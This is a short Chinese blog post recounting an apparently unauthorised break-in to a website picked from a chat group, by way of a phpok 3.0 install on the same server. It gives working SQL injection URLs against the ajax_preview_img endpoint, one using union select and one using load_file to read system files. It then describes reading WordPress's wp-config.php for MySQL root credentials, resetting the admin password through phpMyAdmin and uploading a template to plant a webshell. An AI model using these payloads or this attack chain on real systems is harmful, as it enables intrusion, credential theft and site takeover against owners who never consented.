群里丢出来一个站,用的不知名(或者我不知道)的程序,伪静态,旁站有三四个,子目录下有个wordpress程序,不过似乎模板有点问题爆出来路径了,旁站是一个phpok 3.0的程序,我也没用过,网上有一些漏洞文章,一开始用工具爬出来一个注入:
http://www.xxxxx.com/index.php?langid=en
不过回显很蛋疼,看群里有人已经爆出来能直接回显的注入点,我就又搜索了下,看到这个:
http://www.xxxxx.com/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23
回显非常清晰:
读取文件"C:\boot.ini":
http://www.xxxxx.com/index.php?c=open&f=ajax_preview_img&idstring=0)%20union%20select%201,load_file(0x633A5C626F6F742E696E69)%23
刚开始的时候爆的路径,读了wordpress的"wp-config.php"文件获取到mysql账户密码(root),然后真好还有个phpmyadmin,进去之后修改wordpress账户密码,进wordpress后台传模板拿shell。
转载请注明: 本文《由phpok3.0的渗透》来源于bstaint的博客
没有评论:
发表评论